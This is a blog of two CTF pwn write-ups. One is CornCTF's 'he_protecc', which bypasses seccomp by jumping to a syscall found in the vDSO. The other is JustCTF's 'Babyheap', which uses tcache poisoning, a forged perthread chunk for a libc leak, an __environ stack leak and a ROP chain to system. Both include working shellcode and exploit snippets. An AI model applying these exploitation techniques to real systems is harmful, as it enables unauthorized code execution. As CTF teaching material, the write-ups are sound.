Ub1k's Blog | Capture The Flag & Vulnerability Research

he_protecc: CornCTF 2025

David Hermes — Fri, 20 Jun 2025 00:00:00 GMT

This is the first pwn challenge of CornCTF 2025.

Upon inspecting the binary, we immediately notice two things:

The security mitigations are very relaxed: the GOT is writable (Partial RELRO), and the code is not position-independent (No PIE), so its addresses are not randomized.
The ELF is statically linked, so ret2libc is off the table and there are no dynamic-library shenanigans to deal with this time.

Running the binary, we are prompted for the length of some shellcode, followed by the shellcode itself.

It would definitely be too easy if we could just execute execve("/bin/sh", NULL, NULL) and get a shell. Let's take a closer look at the binary to see what's really happening.

Looking around

Disassembling the binary reveals code that is easy to read and understand, so let's look at the most important parts.

mmap my beloved

:::note mmap() creates a new mapping in the virtual address space of the calling process. In other words, it creates a new memory area at a position and with permissions chosen by the caller. It is used when loading dynamic libraries and, in some cases, by the heap allocator. In our case the program needs an mmap region because no existing area is writable and executable at the same time. :::

The mmap call is easy to understand:

New memory area is mapped at position 0x500000.
The size is 0x1000 bytes (one page or 4096 bytes).
The protection parameter is RWX: PROT_READ | PROT_WRITE | PROT_EXEC = 001 | 010 | 100 = 111 (7)

To decode the flags, we can run the binary under strace, which prints the mmap call with symbolic flag names.

The two flags, MAP_PRIVATE and MAP_ANONYMOUS, simply signal that the mapped region is private to our process and not backed by any file, which means the area is initialized with zeroes.
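To double-check these arguments, here is a small Python sketch that decodes the protection and flag bitmasks back into names. The constant values are the Linux x86-64 ones, hardcoded here as an assumption; `decode` is just an illustrative helper, and the flag value assumes the binary passes exactly MAP_PRIVATE | MAP_ANONYMOUS as described above.

```python
# Linux x86-64 values of the mmap constants (assumed; other platforms differ)
PROT_FLAGS = {"PROT_READ": 0x1, "PROT_WRITE": 0x2, "PROT_EXEC": 0x4}
MAP_FLAGS = {"MAP_SHARED": 0x01, "MAP_PRIVATE": 0x02, "MAP_FIXED": 0x10, "MAP_ANONYMOUS": 0x20}


def decode(value: int, table: dict) -> str:
    """Return the names of the bits set in `value`, joined with '|'."""
    names = [name for name, bit in table.items() if value & bit]
    return "|".join(names) if names else "0"


prot = PROT_FLAGS["PROT_READ"] | PROT_FLAGS["PROT_WRITE"] | PROT_FLAGS["PROT_EXEC"]
flags = MAP_FLAGS["MAP_PRIVATE"] | MAP_FLAGS["MAP_ANONYMOUS"]

print(hex(prot), decode(prot, PROT_FLAGS))    # 0x7 PROT_READ|PROT_WRITE|PROT_EXEC
print(hex(flags), decode(flags, MAP_FLAGS))   # 0x22 MAP_PRIVATE|MAP_ANONYMOUS
```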

A boring mmap region, nothing special here... sadly

seccomp

I'm not going to show the full setup_seccomp() disassembly, as it is a bit ugly; the important part comes at the end.

The prctl call sets the NO_NEW_PRIVS flag. Why? It is a security measure that stops privilege escalation through a crafted seccomp filter, which is why an unprivileged process must set it before installing any filter (explanation). The next instruction, the syscall, installs the seccomp filter on the process.

:::note As the name suggests, seccomp is a mechanism to harden syscall access by evaluating a small program called a Berkeley Packet Filter (BPF) for every syscall. Based on the result, the syscall is either allowed or denied. :::

So the question becomes: what does this seccomp filter allow? I was today years old when I learned that I don't need to decode seccomp filters by hand... there is a tool for that, thanks Marco (GitHub).

So by executing seccomp-tools dump ./protected we get:

 line  CODE  JT   JF     K
=================================
 0000: 0x20 0x00 0x00 0x00000008  A = instruction_pointer
 0001: 0x01 0x00 0x00 0x003fffff  X = 4194303 (0x3fffff)
 0002: 0x2d 0x00 0x0a 0x00000000  if (A <= X) goto 0013
 0003: 0x01 0x00 0x00 0x004b7fff  X = 4947967 (0x4b7fff)
 0004: 0x2d 0x00 0x07 0x00000000  if (A <= X) goto 0012
 0005: 0x01 0x00 0x00 0x004fffff  X = 5242879 (0x4fffff)
 0006: 0x2d 0x00 0x06 0x00000000  if (A <= X) goto 0013
 0007: 0x01 0x00 0x00 0x00500fff  X = 5246975 (0x500fff)
 0008: 0x2d 0x00 0x03 0x00000000  if (A <= X) goto 0012
 0009: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer >> 32
 0010: 0x01 0x00 0x00 0x00007fff  X = 32767 (0x7fff)
 0011: 0x2d 0x00 0x01 0x00000000  if (A <= X) goto 0013
 0012: 0x06 0x00 0x00 0x80000000  return KILL_PROCESS
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW

This is not a typical seccomp filter. Normally, a seccomp filter checks the syscall number against an allowlist and decides whether the call is permitted. Here, instead, the filter loads the instruction pointer (RIP) at the moment the syscall is executed and returns ALLOW only if it lies in one of the following ranges; otherwise the process is killed:

Up to 0x3fffff: impossible in practice, because the binary's address space starts at 0x400000.
Above 0x4b7fff and up to 0x4fffff: but there are no syscall instructions in that region.
Above 0x500fff and up to 0x7fffffffffff: past the mmap region. The mmap region itself (0x500000-0x500fff) is excluded, which is why we can't execute a syscall directly from the shellcode :(
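The filter logic is small enough to replay by hand. The Python sketch below is a hypothetical re-implementation of the dumped program, not part of the exploit, and the sample addresses (including the vDSO one) are made up. One detail worth knowing: seccomp_data.instruction_pointer is a 64-bit field, and the 32-bit load at offset 8 reads only its low half on little-endian x86-64, so the first four comparisons ignore the upper 32 bits of RIP.

```python
KILL, ALLOW = "KILL_PROCESS", "ALLOW"


def run_filter(rip: int) -> str:
    """Replay the dumped seccomp program for a 64-bit instruction pointer."""
    a = rip & 0xFFFFFFFF          # 0000: A = instruction_pointer (low 32 bits)
    if a <= 0x3FFFFF:             # 0002
        return ALLOW
    if a <= 0x4B7FFF:             # 0004
        return KILL
    if a <= 0x4FFFFF:             # 0006
        return ALLOW
    if a <= 0x500FFF:             # 0008: covers our RWX page at 0x500000
        return KILL
    a = rip >> 32                 # 0009: A = instruction_pointer >> 32
    if a <= 0x7FFF:               # 0011
        return ALLOW
    return KILL                   # 0012


samples = {
    "binary code": 0x401000,
    "shellcode page": 0x500123,
    "hypothetical vDSO": 0x7FFFF7FC1000,
}
for label, rip in samples.items():
    print(f"{label:18} {rip:#016x} -> {run_filter(rip)}")
```

A side effect of the 32-bit comparisons: an address like 0x7fff00500000 would be killed even though it lies above 0x500fff, because its low half falls inside the blocked window.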

But WAIT, what can we find after 0x500fff but before 0x7fffffffffff?

Let's run our debugger of choice and look at the mappings.

Using vmmap, we can see that in that address range only one mapping has read and execute permissions: the vDSO.

:::note vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode. (Wikipedia) :::

By disassembling that memory area and piping the output into grep, we can see a few syscall instructions inside the vDSO; jumping to one of them should give us the syscall we need!

Leak & Pwn

Here comes the problem: even though the ELF is not PIE, the stack and the vDSO are still randomized by ASLR. Even worse, the layout inside the vDSO depends on the kernel it comes from, so offsets measured locally may not hold on the remote machine... But let's tackle one problem at a time.

The Leak

Using p2p stack vdso, we find four vDSO pointers on the stack; let's use the first one.

Assembly

Now comes the difficult part: we can't compute the offset between the syscall instructions and our leak, because we cannot guarantee that the vDSO layout is the same on the remote machine. We need to scan the memory area instead.

The first part is easy: let's take the first leak and put it into a register:

mov r8, [rbp - 0x218]

We could zero out the 12 least significant bits of the leak to align it to the start of its memory page, but that's unnecessary here: we already know there are 5 syscall instructions scattered across the region, and they can't all be contained in the first 0x340 bytes of the page (the part of the page that precedes our leak). Now let's scan the memory region for a syscall instruction. Its encoding is the two bytes 0F 05, but since x86-64 is little-endian, reading them as a 16-bit word gives 0x050F, so we compare against the bytes in reverse order:

loop:
inc r8
mov ax, word ptr [r8]
cmp ax, 0x050f // <-- syscall opcode but reversed
jne loop

This snippet increments r8 (our pointer into the vDSO) and reads two bytes; if they don't match the syscall encoding, it loops again. Once the loop exits, r8 points to the bytes 0F 05, which execute as a syscall when we jump there, and we can set up the remaining registers for an execve call.
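The loop is easy to sanity-check offline. This Python sketch replays it on a fake page; the 0x1000-byte buffer, the 0x340 start offset and the syscall at 0x3a0 are all made up for illustration, and the bounds check is an addition (the real loop would simply fault when running off the mapping).

```python
SYSCALL = bytes.fromhex("0f05")   # the two bytes encoding `syscall`

# Loaded as a little-endian 16-bit word, 0f 05 becomes 0x050f,
# which is why the shellcode compares ax against 0x050f.
SYSCALL_WORD = int.from_bytes(SYSCALL, "little")


def scan_for_syscall(mem: bytes, start: int) -> int:
    """Mirror of the shellcode loop: increment first, then load and compare."""
    ptr = start
    while True:
        ptr += 1                                           # inc r8
        if ptr + 2 > len(mem):                             # real loop would fault here
            raise ValueError("no syscall found before the end of the mapping")
        word = int.from_bytes(mem[ptr:ptr + 2], "little")  # mov ax, word ptr [r8]
        if word == SYSCALL_WORD:                           # cmp ax, 0x050f
            return ptr                                     # loop exits: r8 -> syscall
        # otherwise: jne loop


# Hypothetical vDSO page: zeros everywhere except a syscall at offset 0x3a0,
# scanned from a leak that sits at offset 0x340.
page = bytearray(0x1000)
page[0x3A0:0x3A2] = SYSCALL
print(hex(SYSCALL_WORD), hex(scan_for_syscall(bytes(page), 0x340)))  # 0x50f 0x3a0
```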

mov r9, {u64(b"/bin/sh\0")}
push r9

mov rax, 59 
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx

jmp r8 // <-- jump to syscall outside our mmap area

Sending this payload spawns a shell, and a simple cat flag.txt gives us the flag!
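For completeness, here is how the {u64(b"/bin/sh\0")} placeholder in the shellcode resolves. pwntools' u64() is a little-endian 64-bit unpack, so this sketch uses struct to stay dependency-free; the loop label is renamed scan here, and assembling the resulting text (for example with pwntools' asm()) is left out.

```python
import struct

# pwntools' u64(b"/bin/sh\0") is a little-endian 64-bit unpack.
BINSH = struct.unpack("<Q", b"/bin/sh\x00")[0]

# After `push r9`, these 8 bytes sit at rsp in memory order: "/bin/sh\0",
# so `mov rdi, rsp` hands execve a valid C string.
assert struct.pack("<Q", BINSH) == b"/bin/sh\x00"

shellcode_src = f"""
    mov r8, [rbp - 0x218]
scan:
    inc r8
    mov ax, word ptr [r8]
    cmp ax, 0x050f
    jne scan
    mov r9, {BINSH:#x}
    push r9
    mov rax, 59
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    jmp r8
"""
print(hex(BINSH))  # 0x68732f6e69622f
```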

Babyheap: JustCTF - Chapter 1

David Hermes — Mon, 20 Oct 2025 00:00:00 GMT

Normally, especially for beginners, a baby challenge is a refreshing alternative to the high-level tasks designed to challenge even the best players.

You solve a very simple challenge and get to encounter a new technique in a simple, protected setting. Babyheap breaks this assumption. To be fair, the title never specified which kind of baby was intended: a newborn beluga whale, for example, can weigh as much as $100$kg, enough to crush my sanity.

By the end of this write-up, I hope you’ll understand both my frustration and my realization: maybe my assumptions about baby challenges were wrong from the start. In fact, I learned more about libc internals and exploitation techniques in this single challenge than in all the other “baby” ones combined.

This is a two-part journey: from simple heap exploitation to advanced techniques, and finally, as dessert, an exit_function overwrite and environ leak.

The disassembly

As usual, we are not going to look at the entire binary, but will focus on the relevant parts instead. For context, the program is straightforward:

create_chunk() Allocates a buffer of size 0x30.
modify_chunk() Allows you to overwrite the contents of an existing chunk.
read_chunk() Reads the full 0x30 bytes from a chunk.
delete_chunk() Frees the chunk.

We are going to concentrate on two of these functions:

//babyheap
int create_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&chunks + index) )
	return puts("This index is already in use");
  *((_QWORD *)&chunks + index) = malloc(0x30uLL);
  printf("Content? ");
  printf("Content? "); //wtf why?
  return read(0, *((void **)&chunks + index), 0x30uLL);
}

As described above, this function creates a chunk and saves its address in an array of at most $20$ entries; if the entry is already occupied, it prints an error message and returns without allocating.

//babyheap
void delete_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&chunks + index) )
    free(*((void **)&chunks + index));
  else
    puts("This chunk is empty");
}

Looking at the delete_chunk() function, we notice that it doesn't remove the address from the array after freeing the chunk. This has two implications: first, we can still read from and write to a freed chunk (a use-after-free); second, once a chunk has been created at an index, create_chunk() can never be called on that index again, which limits us to at most 20 create_chunk() calls.

Heap Exploitation

:::warning Heap exploitation is a complex topic, so I won’t go too deep here. If you are interested, here is a link to some material. :::

When malloc() is called, it generally returns an address in the heap. This address points to the user data of a struct whose preceding fields hold important metadata. We call these memory areas chunks.

From now on we will include the chunk header, so the chunk size becomes 0x40 instead of 0x30. Looking at the chunk header, we notice a few significant fields. The size field stores the number of bytes from the start of this chunk to the start of the next one, yet nothing stops us from writing more bytes than the size field specifies. Another interesting part is the P flag (PREV_INUSE): if it is set, free() knows that the previous chunk is currently allocated; if it isn't, the allocator may try to merge the two chunks into a bigger one.
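The 0x30 to 0x40 step and the P flag can be checked with a small Python sketch of glibc's size arithmetic, assuming x86-64 constants (8-byte size fields, 16-byte alignment, 0x20 minimum chunk). Only 8 bytes of header are added because, while a chunk is in use, the next chunk's prev_size field doubles as spare room for its user data. The helper names are illustrative.

```python
SIZE_SZ = 8               # x86-64
MALLOC_ALIGN_MASK = 0xF   # 16-byte alignment
MINSIZE = 0x20            # smallest chunk glibc hands out on x86-64

PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 0x1, 0x2, 0x4


def request2size(req: int) -> int:
    """Chunk size glibc uses for malloc(req), mirroring its request2size macro."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK


def parse_size_field(raw: int) -> tuple:
    """Split a raw size field into (chunk size, PREV_INUSE set?)."""
    size = raw & ~(PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
    return size, bool(raw & PREV_INUSE)


print(hex(request2size(0x30)))   # 0x40
print(parse_size_field(0x41))    # (64, True)
```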

The bins

When a chunk is freed, from LIBC-2.26 onwards the allocator first tries to push a pointer to its user data onto the head of a per-size-class singly linked list called the tcache. Each size class holds up to 7 chunks, and the tcache covers chunk sizes up to 0x410 bytes.

In the free operation, the first 0x10 bytes of the user data are overwritten with a pointer to the next chunk in the list (fd) and a random value called tcache key used to prevent double frees (not to be confused with the tcache mangling key explained later in this chapter). This means that when a freed chunk is read, you won't read the content it stored before but a pointer to a previously freed chunk or, if this is the first freed chunk, a null pointer.

If the tcache bin for that size already holds 7 chunks and the chunk is between 0x20 and 0x80 bytes long, the allocator puts it into a fastbin. Fastbins have no limit on the number of chunks they can store, but only cover the size classes mentioned above. Also, a fastbin fd pointer doesn't point to the next chunk's fd field (as in the tcache) but to its prev_size field, i.e. the start of the chunk.

If the tcache can't take the chunk (its bin is full or the chunk is bigger than 0x410 bytes) and the chunk is too big for the fastbins, or in very specific cases when fastbin consolidation is triggered (foreshadowing), chunks are placed into the unsortedbin. From there they can get sorted into the largebins or smallbins.

These last three bins are implemented as circular doubly linked lists. Their heads are stored in libc's address space, more precisely in main_arena. Because the lists are circular, the last element's forward (fd) pointer points to the list head in the arena, and because they are doubly linked, the first element's backward (bk) pointer points to it too. So by reading a freed chunk in one of these bins, we get a libc leak.
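The routing rules above can be summarised in a deliberately simplified Python model. It is a sketch, not glibc's actual logic: it ignores merging with free neighbours, mmapped chunks and all integrity checks, and assumes the default tunables (7 entries per tcache bin, fastbins up to 0x80). The next_is_top case is the "trimming" that the forged-chunk reasoning below has to avoid.

```python
TCACHE_COUNT = 7          # default number of chunks per tcache bin
TCACHE_MAX_CHUNK = 0x410  # largest chunk size the tcache handles
FASTBIN_MAX_CHUNK = 0x80  # default fastbin limit on x86-64


def free_destination(chunk_size: int, tcache_filled: int, next_is_top: bool = False) -> str:
    """Simplified model of where free() sends a non-mmapped chunk."""
    if chunk_size <= TCACHE_MAX_CHUNK and tcache_filled < TCACHE_COUNT:
        return "tcache"
    if chunk_size <= FASTBIN_MAX_CHUNK:
        return "fastbin"
    if next_is_top:
        return "merged into top"
    return "unsortedbin"


print(free_destination(0x40, tcache_filled=3))                     # tcache
print(free_destination(0x40, tcache_filled=7))                     # fastbin
print(free_destination(0x420, tcache_filled=0))                    # unsortedbin
print(free_destination(0x420, tcache_filled=0, next_is_top=True))  # merged into top
```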

tcache poisoning

If this binary had Partial RELRO and was non-PIE, we could have allocated two chunks and then freed them.
Once freed, both chunks would be placed in the tcache list, and where their data used to be, pointers to the next chunk in the list would now be written. By overwriting the forward pointer of the last freed chunk (the head of the tcache list) with something like a GOT address, we would make the allocator treat that GOT address as the second element of the list, in place of the first chunk we freed.
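The idea can be illustrated with a toy Python model of a single tcache bin. It is a sketch that ignores pointer mangling (covered next) and every integrity check, and all addresses are hypothetical. The counter is there because recent glibc versions only serve an allocation from a tcache bin while its count is non-zero, which is one reason the attack frees two chunks rather than one.

```python
from typing import Optional


class ToyTcacheBin:
    """Toy model of one tcache bin: a LIFO singly linked list plus a counter."""

    def __init__(self) -> None:
        self.memory = {}   # address -> 8-byte value stored there
        self.head = 0      # 0 means "empty list"
        self.count = 0

    def free(self, addr: int) -> None:
        self.memory[addr] = self.head     # fd is written into the user data
        self.head = addr
        self.count += 1

    def malloc(self) -> Optional[int]:
        if self.count == 0:
            return None                   # real malloc would use another path
        addr = self.head
        self.head = self.memory.get(addr, 0)  # blindly follow fd
        self.count -= 1
        return addr


GOT_ENTRY = 0x404018                      # hypothetical GOT slot (non-PIE)
tbin = ToyTcacheBin()
tbin.free(0x4052A0)                       # chunk A
tbin.free(0x4052E0)                       # chunk B, now the head; fd -> A
tbin.memory[0x4052E0] = GOT_ENTRY         # use-after-free write into B's fd
first = tbin.malloc()                     # returns B
second = tbin.malloc()                    # returns the GOT slot
print(hex(first), hex(second))            # 0x4052e0 0x404018
```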

:::warning From LIBC-2.32, the forward pointers (fd) saved in freed tcache entries are encoded (mangled).

//libc internals
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

The macro takes as input the address where the pointer is stored (pos) and the pointer value itself (ptr).

It then shifts away the 12 least significant bits of pos. A memory page is generally 0x1000 bytes long, so the offset inside a page takes exactly 12 bits: shifting them away removes the position within the page and leaves only the page number. In other words, two pointers stored in the same page have the same ((size_t) pos) >> 12 value. This value is then XORed with the pointer to mangle it.

This ensures that the encoded value depends both on the pointer and on the page where it is stored. Pointers stored in different pages will be mangled differently, even if they point to the same target.

Applying the same operation again, with the same pos, reveals the pointer: that is exactly what REVEAL_PTR does.

But this encoding is easily reversed even without knowing pos: when the pointer and the slot that stores it live in the same page, the page number used for mangling is also the upper part of the pointer itself, so the algorithm is little more than a deterministic scramble. XORing the mangled pointer with shifted copies of itself completely decodes it.

def demangle_alone(ptr, page_offset=0):
    mid = ptr ^ ((ptr >> 12) + page_offset)
    return mid ^ (mid >> 24)

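A quick way to convince yourself that both decoders work is to round-trip a pointer in Python. This sketch re-implements the two macros (the lowercase names are ours) and repeats demangle_alone() so it is self-contained; the heap addresses are hypothetical, and demangle_alone() recovers the pointer here only because both addresses sit in the same page and the pointer fits in 48 bits.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """PROTECT_PTR(pos, ptr): XOR ptr with the page number of its storage slot."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, mangled: int) -> int:
    """REVEAL_PTR: the same XOR again, which requires knowing pos."""
    return (pos >> 12) ^ mangled


def demangle_alone(ptr: int, page_offset: int = 0) -> int:
    """Decoder from above: needs no pos when ptr and pos share a page."""
    mid = ptr ^ ((ptr >> 12) + page_offset)
    return mid ^ (mid >> 24)


# Hypothetical tcache entry stored at `pos` whose fd points to another chunk
# in the same 0x1000-byte heap page.
pos, target = 0x55555555B2E0, 0x55555555B2A0
mangled = protect_ptr(pos, target)
print(hex(mangled))                    # 0x55500000e7fb
print(hex(reveal_ptr(pos, mangled)))   # 0x55555555b2a0
print(hex(demangle_alone(mangled)))    # 0x55555555b2a0
```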
:::

Then, by reallocating the two chunks, the allocator would return the GOT address as the second allocation (the first 16 bytes get zeroed out; see the note below), and we could then:

Read from the GOT through the second chunk to leak a libc address. This only works with ‘fwrite()’ or similar, because the first 0x10 bytes are zeroed, which makes ‘printf’ or ‘puts’ stop immediately.
Overwrite a GOT entry (free) with the address of system(), giving us a shell the next time that function is called.

:::note From LIBC-2.29, the 8 bytes that follow the fd pointer in a freed chunk store the tcache key, and these 16 bytes get zeroed out when the chunk is allocated again. If the tcache key is present when a chunk is freed, the corresponding tcache bin is checked for a double free; otherwise no check is done. :::

But that’s not the case here… behold:

Still, this very simple technique called tcache poisoning will prove useful several times throughout this writeup.

But let’s exit this hypothetical scenario and focus on the real limitations we face: the binary has no apparent address leak and no buffer overflow, we need to take control in some other way.

The Plan

Our actual goal is to gain arbitrary read and write primitives within libc. With these, we can leak crucial pointers like __environ or __exit_funcs, and eventually get a shell. At this point, it’s worth clarifying that I didn’t solve this challenge during the competition itself. Instead, I studied various writeups to deeply understand the possible solutions and their underlying mechanics.

I’ll present two methods to leak a libc pointer, followed by two techniques to leverage that leak to achieve a shell. The first leak and exploit can be found in this part, the second part includes a more exotic variant.

House of something

As explained in the heap primer, the heads of the linked lists for smallbin, largebin, and unsortedbin live in main_arena inside libc. Those lists are doubly linked and circular. If we can move a chunk into one of those bins we can read the fd pointer that points back into libc and obtain a libc leak usable later.

Sending a chunk into those bins requires freeing a large enough chunk. The tcache holds chunks up to size 0x410 (inclusive), so we must either create a single chunk larger than 0x410 or free more than seven smaller chunks of the same size while avoiding the fastbin path (i.e. using chunks above 0x80 bytes). We will go for the first option and try to free a chunk larger than 0x410.

Reasoning about chunks

Question: By manipulating a chunk’s fd pointer (tcache poisoning) to position the next chunk in the tcache list just above a previously allocated third chunk, is it possible to use the first chunk to alter the size metadata of the second chunk, so that when the third chunk is freed, the allocator interprets its size as 0x420 bytes and moves the chunk into unsortedbin?

In theory, yes, but with important caveats. We must have a second chunk immediately after our forged chunk (taking its modified size into account), so that freeing the giant chunk doesn't just merge it into the top chunk (trimming it away).
Targeting a 0x420 size will cross past the current top chunk, so we need to allocate enough intermediate chunks until our guard chunk (the second chunk mentioned before) sits directly after our forged chunk. Only then can freeing the forged chunk make the allocator interpret a 0x420 size and move the chunk to unsortedbin instead of trimming it away, producing the desired libc leak.

To guarantee that an extra chunk is placed immediately behind our forged 0x420 chunk we expand the forged size slightly to 0x440. Because small chunks are 0x40 bytes, the 0x440 size ensures the forged chunk completely overlaps the final small chunk in that region.

But it's not that simple: with 19 allocations, we don't have enough chunks both to push the top chunk past our forged one and to do the tcache poisoning needed for the final exploitation. We need another strategy.

tcache_perthread_struct

The tcache has a significant property that the other bins don't have: it is local to a specific thread, so if more threads are present in the process, more tcaches are created. To make this work, a tcache_perthread_struct is allocated for every thread, containing the heads of the linked lists and the number of freed chunks in each. For the main thread, this 0x290-byte perthread chunk is allocated at the very beginning of the heap.

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42/source/malloc/malloc.c#L3127
typedef struct tcache_perthread_struct
{
  uint16_t num_slots[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
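The 0x290 figure can be reproduced with ctypes. This sketch assumes TCACHE_MAX_BINS = 64, which is what a 0x290 chunk implies; the bin count may differ in other glibc versions, so treat it as an assumption about the challenge's libc. The request2size rounding is inlined for x86-64.

```python
import ctypes

TCACHE_MAX_BINS = 64   # assumption: matches the 0x290 chunk seen in this challenge


class TcachePerthreadStruct(ctypes.Structure):
    _fields_ = [
        ("num_slots", ctypes.c_uint16 * TCACHE_MAX_BINS),  # per-bin counters
        ("entries", ctypes.c_void_p * TCACHE_MAX_BINS),    # per-bin list heads
    ]


user_size = ctypes.sizeof(TcachePerthreadStruct)   # 64 * 2 + 64 * 8 bytes
chunk_size = (user_size + 8 + 15) & ~15            # request2size on x86-64
print(hex(user_size), hex(chunk_size))             # 0x280 0x290
```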

Using the heap command in pwndbg, we can spot the perthread chunk (the first one); the second one is a 0x40 chunk created through the program's menu, and the last one is the top chunk.

So, could we use this chunk as our forged chunk?
Yes. Even though we never directly allocated this chunk and thus did not receive its pointer, we can still allocate a new chunk that completely overlaps the first 0x40 bytes of the perthread_struct. From there, we can modify its size field using a slightly overlapping chunk, just like the technique described earlier. By adding new chunks the allocator will place them after the 0x290 perthread_chunk like in the image above.

This approach significantly reduces the number of required allocations to correctly position the guard chunk, from 16 allocations (excluding the guard and the two overlapping chunks) down to just 6.
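Where does the 6 come from? A back-of-the-envelope check in Python, assuming a fresh heap where the perthread chunk sits at offset 0 and every menu allocation is a 0x40 chunk carved from the top chunk:

```python
PERTHREAD_CHUNK = 0x290      # real size of the tcache_perthread_struct chunk
FORGED_SIZE = 0x440          # size we plan to write into its header
SMALL_CHUNK = 0x40           # every chunk the menu allocates (malloc(0x30))

# Menu chunks are carved one after another starting right after the perthread chunk.
fillers = (FORGED_SIZE - PERTHREAD_CHUNK) // SMALL_CHUNK
guard_offset = PERTHREAD_CHUNK + fillers * SMALL_CHUNK
print(fillers, hex(guard_offset), hex(FORGED_SIZE))   # 6 0x410 0x440
```

Under these assumptions, the six filler chunks span 0x290-0x410, so the last of them lies entirely inside the forged 0x440-byte chunk, while the guard chunk starts at 0x410 and extends past the forged chunk's end at 0x440.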

The main drawback is that the perthread_struct becomes corrupted, breaking the tcache metadata: in particular, the chunk counts stored at the beginning of the struct get zeroed out by the allocation and filled with other values at deallocation. Nevertheless, this appears to be our only viable option for obtaining a chunk large enough for our purpose.

You are 0x440 bytes big, trust me

Talk is cheap, so let’s move to the practical part.
We’ll use tcache poisoning to place a chunk exactly where the perthread chunk lives, so that the deallocator will take the perthread chunk's size field as the size of our own chunk. Then, we allocate a second chunk and poison the tcache again so that it partially overlaps the perthread/fake-chunk metadata. This overlapping chunk gives us write access to the perthread metadata, allowing us to modify its size field from 0x290 to 0x440.

Next, we allocate enough chunks to push the top chunk downward: six allocations plus the guard chunk.
By looking at the addresses of the chunks in the image below we can notice the modified perthread chunk with the guard chunk right beneath it.

Finally, we free the chunk placed over the perthread structure: the deallocator checks its size and puts it into the unsorted bin. During this process, the allocator writes fd (forward) and bk (backward) pointers into the freed chunk, and these pointers reference main_arena. Reading from the freed chunk’s user area thus reveals a libc pointer!
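To turn that leak into a libc base, we need to know where in main_arena it points. The sketch below is a Python ctypes mirror of the first fields of glibc's struct malloc_state, assuming the modern x86-64 layout (10 fastbins, 8-byte pointers); the main_arena offset itself depends on the exact libc build, so it is left as a parameter and the values in the usage below are hypothetical.

```python
import ctypes

NFASTBINS = 10   # x86-64 default
NBINS = 128


class MallocStatePrefix(ctypes.Structure):
    """Leading fields of struct malloc_state (assumed modern x86-64 layout)."""
    _fields_ = [
        ("mutex", ctypes.c_int),
        ("flags", ctypes.c_int),
        ("have_fastchunks", ctypes.c_int),
        ("fastbinsY", ctypes.c_void_p * NFASTBINS),
        ("top", ctypes.c_void_p),
        ("last_remainder", ctypes.c_void_p),
        ("bins", ctypes.c_void_p * (NBINS * 2 - 2)),
    ]


FD_OFFSET = 0x10  # offsetof(struct malloc_chunk, fd): prev_size + size

# The unsorted bin head, bin_at(av, 1), is &bins[0] - FD_OFFSET; that is the
# value written into fd/bk of a chunk sitting alone in the unsorted bin.
UNSORTED_LEAK_OFFSET = MallocStatePrefix.bins.offset - FD_OFFSET
print(hex(UNSORTED_LEAK_OFFSET))  # 0x60


def libc_base_from_leak(leak: int, main_arena_offset: int) -> int:
    """main_arena_offset is build-specific and must be looked up for the target libc."""
    return leak - UNSORTED_LEAK_OFFSET - main_arena_offset
```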

ROP exploit using `__environ`

Once we have arbitrary read and write inside libc, getting a stack leak is very simple. Enter __environ.

The __environ variable

:::note Yes, here's a joke about __environ: __environ goes to therapy. Talks nonstop for hours. Then it asks, “Why always me?”
Therapist responds, “It all comes from your environment.” :::

__environ is a global variable in libc that points to the environment variables (the envp array) stored on the stack:

environ = libc_base + libc.symbols.__environ

The ROP chain

We can use tcache poisoning to overwrite the fd pointer of the first freed chunk with the address of __environ. After allocating twice, the second allocation will return a chunk overlapping the __environ pointer.

Keep in mind: malloc() zeroes out the first 0x10 bytes, so we must allocate at an offset. In this case, we offset by 0x18 because chunks must also be aligned to 0x10:

environ_leak = u64(read(r, 10)[0x18:0x20])
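The 0x18 follows from the two constraints just mentioned. Recent glibc refuses misaligned tcache entries ("malloc(): unaligned tcache chunk detected"), and per the observation above the first 0x10 bytes of the returned chunk get clobbered. A small Python sketch of that choice, with a hypothetical __environ address ending in 8 (the helper name is ours):

```python
def chunk_target_before(addr: int, reserved: int = 0x10) -> tuple:
    """Return (fake chunk address, offset of addr inside it).

    The fake chunk must be 16-byte aligned and leave addr outside the first
    `reserved` bytes of user data, which the write-up observes get zeroed.
    """
    target = (addr - reserved) & ~0xF
    return target, addr - target


environ_addr = 0x7FFFF7E1A2D8        # hypothetical __environ address ending in 8
target, offset = chunk_target_before(environ_addr)
print(hex(target), hex(offset))      # 0x7ffff7e1a2c0 0x18
```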

From here, we measure once (in a debugger) the distance between the leaked environ value and the stack slot holding main's return address. Since both live on the same stack, this offset is constant across runs, so subtracting it from the environ leak always gives us the location of main's return address.

Using our tcache poisoning technique once more, we can overwrite the return address with a ROP chain. I opted for:

pop_rdi = libc_base + 0x000000000010f75b
binsh = libc.binsh() + libc_base
ret = pop_rdi + 1
system = libc_base + libc.symbols.system

return_pointer = environ_leak - 0x130 # 0x130 is the offset from environ to main return
update(r, 9, p64((return_pointer-0x08) ^ mask)) # 0x08 for heap alignment
create(r, 11, b"dummy")
create(r, 12, p64(0) + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system))

We need to add a single ret gadget because otherwise the stack would not be aligned to a multiple of 0x10 when system() runs. Adding $1$ to the pop rdi gadget address gives us a lone ret, because pop rdi is encoded as a single byte (0x5f) and is immediately followed by the gadget's ret (0xc3).

